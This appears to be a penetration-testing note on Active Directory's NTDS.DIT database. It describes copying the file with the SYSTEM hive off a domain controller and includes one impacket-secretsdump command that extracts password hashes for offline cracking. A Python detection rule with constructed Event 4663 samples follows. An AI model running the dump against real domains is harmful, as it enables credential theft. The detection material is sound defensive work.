NTDS Tom Foolery

Introduction

NTDS, specifically the NTDS.DIT file, is not just a file within Active Directory; it is the core of the entire infrastructure. It serves as the centralized repository for all of the domain's objects and their associated information.

NTDS.DIT Location

The NTDS.DIT file is typically located at C:\Windows\NTDS\Ntds.dit, although administrators can specify an alternate location during setup, so the file is not guaranteed to be at the default path.

Extracting Password Hashes

Once we have located NTDS.DIT and the SYSTEM registry hive (which holds the boot key needed to decrypt the hashes stored in NTDS.DIT), we can exfiltrate both files back to our host and crack the hashes offline.

Impacket-Secretsdump

kali@kali$ impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL -outputfile ntlm-extract
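From the defender's side, the step above only works if someone first reads ntds.dit off the domain controller, and on a healthy DC that file is held open only by lsass.exe. The following is an added example (not part of the original page and not Impacket code) showing a minimal detection rule over file-access audit events: it flags Windows Security Event ID 4663 records where a process other than lsass.exe touched an ntds.dit file, at any path, since the database may live outside the default folder. The events are constructed sample records, and the rule assumes object-access auditing with a SACL on the NTDS folder is already enabled, otherwise 4663 is never generated.

```python
"""Flag non-LSASS access to the Active Directory database file (ntds.dit).

Added example: consumes already-parsed Security log records (Event ID 4663,
"An attempt was made to access an object"). The sample events below are
constructed for illustration; field names mirror the 4663 event's
ObjectName / ProcessName / SubjectUserName fields.
"""
from dataclasses import dataclass
from typing import Dict, Iterable, List

# Windows Security log: object access attempted (requires a SACL on the file).
EVENT_OBJECT_ACCESS = 4663

# On a domain controller only LSASS is expected to hold ntds.dit open.
# Paths are compared lower-cased, so list them lower-cased here.
ALLOWED_PROCESSES = {r"c:\windows\system32\lsass.exe"}


@dataclass(frozen=True)
class FileAccessEvent:
    event_id: int
    object_name: str    # file path from the 4663 ObjectName field
    process_name: str   # full path from the ProcessName field
    subject_user: str   # DOMAIN\user from SubjectDomainName\SubjectUserName


def is_ntds_database(path: str) -> bool:
    """True when the path points at an ntds.dit file, wherever it lives.

    Administrators can relocate the database at DC promotion, so only the
    file name is matched, not the C:\\Windows\\NTDS default folder.
    """
    normalized = path.strip().lower().replace("/", "\\")
    return normalized.endswith("\\ntds.dit")


def suspicious_ntds_access(events: Iterable[FileAccessEvent]) -> List[Dict[str, str]]:
    """Return one finding per 4663 event on ntds.dit from a non-allowlisted process."""
    findings: List[Dict[str, str]] = []
    for ev in events:
        if ev.event_id != EVENT_OBJECT_ACCESS:
            continue                                   # not a file-access audit record
        if not is_ntds_database(ev.object_name):
            continue                                   # some other file in the NTDS folder
        if ev.process_name.lower() in ALLOWED_PROCESSES:
            continue                                   # LSASS holding the database is normal
        findings.append({
            "user": ev.subject_user,
            "path": ev.object_name,
            "process": ev.process_name,
        })
    return findings


# Constructed sample records (hypothetical CONTOSO domain, not real telemetry).
SAMPLE_EVENTS = [
    # Normal: LSASS holds the database open.
    FileAccessEvent(4663, r"C:\Windows\NTDS\Ntds.dit",
                    r"C:\Windows\System32\lsass.exe", r"NT AUTHORITY\SYSTEM"),
    # Suspicious: an interactive shell reading the database file.
    FileAccessEvent(4663, r"C:\Windows\NTDS\Ntds.dit",
                    r"C:\Windows\System32\cmd.exe", r"CONTOSO\jdoe"),
    # Suspicious: relocated database on D:, read by PowerShell.
    FileAccessEvent(4663, r"D:\ADData\Ntds.dit",
                    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                    r"CONTOSO\svc-backup"),
    # Benign: a different ESE file in the same folder.
    FileAccessEvent(4663, r"C:\Windows\NTDS\edb.chk",
                    r"C:\Windows\System32\notepad.exe", r"CONTOSO\jdoe"),
    # Ignored: not a 4663 record even though the path matches.
    FileAccessEvent(4656, r"C:\Windows\NTDS\Ntds.dit",
                    r"C:\Windows\System32\cmd.exe", r"CONTOSO\jdoe"),
]


if __name__ == "__main__":
    for finding in suspicious_ntds_access(SAMPLE_EVENTS):
        print(f"ALERT ntds.dit access: {finding['user']} via {finding['process']} -> {finding['path']}")
```

In production the allowlist should also cover any backup agent that legitimately reads the database, and the rule is best paired with 4663 events on the SYSTEM hive file, since the page notes both are needed to recover usable hashes.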

The only thing left to do is:
